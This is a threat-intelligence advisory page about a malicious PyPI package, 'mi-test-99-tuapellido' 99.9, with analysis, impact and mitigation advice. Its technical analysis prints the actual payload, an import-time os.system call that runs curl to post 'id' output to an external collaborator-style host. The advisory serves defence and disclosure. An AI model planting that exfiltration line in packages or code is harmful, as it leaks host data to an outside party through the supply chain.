Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

MAL-2026-6478: Malicious code in mi-test-99-tuapellido (PyPI)

0
Medium
Published: 06/25/2026 (06/25/2026, 21:11:03 UTC)
Source: GCVE Database
Product: mi-test-99-tuapellido

Description

The PyPI package 'mi-test-99-tuapellido' version 99.9 contains malicious code that executes on import. It runs a shell command that sends the output of the 'id' command (user and group identity information) to an attacker-controlled domain via an unencrypted HTTP POST request. The package metadata indicates it is a placeholder or proof-of-concept, consistent with dependency confusion or namespace squatting attacks. This behavior occurs without user consent or any legitimate functionality. The package is identified as malicious by multiple sources and is designed to exfiltrate basic host information.

Affected software

PyPIghsa
mi-test-99-tuapellido
Affected versions
=99.9

Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 06/26/2026, 22:41:19 UTC

Technical Analysis

The 'mi-test-99-tuapellido' PyPI package (version 99.9) contains a top-level __init__.py that executes 'os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")' on import. This command sends the current user's identity information to a Burp Suite Collaborator-like service, confirming remote code execution and data exfiltration. The package metadata is placeholder text, indicating it is likely a test or proof-of-concept malicious package designed for dependency confusion or namespace squatting attacks. The package has no legitimate functionality and is flagged as malicious by OpenSSF Package Analysis and other sources.

Potential Impact

Importing or installing this package results in arbitrary shell command execution on the host system, specifically leaking user and group identity information to an attacker-controlled server over plaintext HTTP. This compromises confidentiality of host identity information and demonstrates an arbitrary code execution vector. Although the exfiltrated data is limited to basic host identity, the presence of arbitrary shell execution indicates a potentially serious security risk if used in a real attack scenario.

Mitigation Recommendations

No official patch or remediation is available for this package. The best mitigation is to avoid installing or importing 'mi-test-99-tuapellido' version 99.9. Users should verify package authenticity before installation and avoid packages with placeholder metadata or suspicious behavior. Since this is a malicious package on PyPI, removing it from the environment and blocking its installation is recommended. Monitor package sources and use dependency allowlists or trusted registries to prevent accidental installation.

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Gcve Source
db.gcve.eu
Osv Id
MAL-2026-6478
Osv Schema Version
1.7.4
Aliases
[]
Ecosystems
["PyPI"]
Database Specific Severity
null
Cvss Version
null

Threat ID: 6a3ef7de27e9c797190262ae

Added to database: 06/26/2026, 22:06:22 UTC

Last enriched: 06/26/2026, 22:41:19 UTC

Last updated: 06/26/2026, 22:41:19 UTC

Views: 2

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses